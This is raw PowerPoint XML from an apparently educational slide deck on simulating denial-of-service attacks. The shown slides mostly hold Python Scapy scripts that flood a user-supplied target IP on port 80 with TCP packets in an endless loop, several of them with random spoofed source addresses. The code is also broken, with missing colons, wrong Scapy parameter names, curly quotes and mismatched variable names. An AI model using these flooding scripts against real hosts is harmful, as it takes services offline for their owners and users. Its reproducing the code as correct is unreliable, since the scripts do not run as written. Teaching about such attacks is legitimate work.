              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    target_IP = input("Enter IP address of Target: ")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    i = 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    while True:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>       for source_port in range(1, 65535)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>         IP1 = IP(source_IP = source_IP, destination = target_IP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>         TCP1 = TCP(srcport = source_port, dstport = 80)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>         pkt = IP1 / TCP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>         send(pkt, inter = .001)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
      print ("packet sent ", i)
         i = i + 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199766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Multiple IP single port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4976031" y="963877"/>
            <a:ext cx="6377769" cy="4930246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A large number of packets are sent to web server by using multiple IP and from single port number. Its implementation in Python can be done with the help of Scapy. The following Python script implement Single IP multiple port DoS attack −</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>from scapy.all import *
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>target_IP = input("Enter IP address of Target: ")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>source_port = int(input("Enter Source Port Number:"))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i = 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>while True:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   a = str(random.randint(1,254))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   b = str(random.randint(1,254))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   c = str(random.randint(1,254))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   d = str(random.randint(1,254))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   dot = “.”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   Source_ip = a + dot + b + dot + c + dot + d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   IP1 = IP(source_IP = source_IP, destination = target_IP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   TCP1 = TCP(srcport = source_port, dstport = 80)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   pkt = IP1 / TCP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   send(pkt,inter = .001)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   print ("packet sent ", i)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      i = i + 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44704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93739-D420-4A86-B3D2-26F0845DA75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Multiple IP multiple port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51070C-CE0D-4457-BB97-91D1229082ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4976031" y="963877"/>
            <a:ext cx="6377769" cy="4930246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A large number of packets are send to web server by using multiple IPs and from multiple ports. Its implementation in Python can be done with the help of Scapy. The following Python script helps implement Multiple IPs multiple port DoS attack −</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Import random
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>from scapy.all import *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>target_IP = input("Enter IP address of Target: ")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i = 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>while True:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   a = str(random.randint(1,254))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   b = str(random.randint(1,254))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   c = str(random.randint(1,254))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   d = str(random.randint(1,254))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   dot = “.”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   Source_ip = a + dot + b + dot + c + dot + d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   for source_port in range(1, 65535)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      IP1 = IP(source_IP = source_IP, destination = target_IP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      TCP1 = TCP(srcport = source_port, dstport = 80)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      pkt = IP1 / TCP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      send(pkt,inter = .001)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      print ("packet sent ", i)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>         i = i + 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="706095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Simulation of DoS  Attacks</vt:lpstr>
      <vt:lpstr>Contents</vt:lpstr>
      <vt:lpstr>Signs and Symptoms </vt:lpstr>
      <vt:lpstr>Scapy</vt:lpstr>
      <vt:lpstr>Simulation of basic DoS Attack in Python</vt:lpstr>
      <vt:lpstr>Single IP Single port</vt:lpstr>
      <vt:lpstr>Single IP multiple port</vt:lpstr>
      <vt:lpstr>Multiple IP single port</vt:lpstr>
      <vt:lpstr>Multiple IP multiple port</vt:lpstr>
      <vt:lpstr>Reasons behind this attack</vt:lpstr>
      <vt:lpstr>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249</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-06T22:08:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-21T15:05:07Z</dcterms:modified>
</cp:coreProperties>
</file>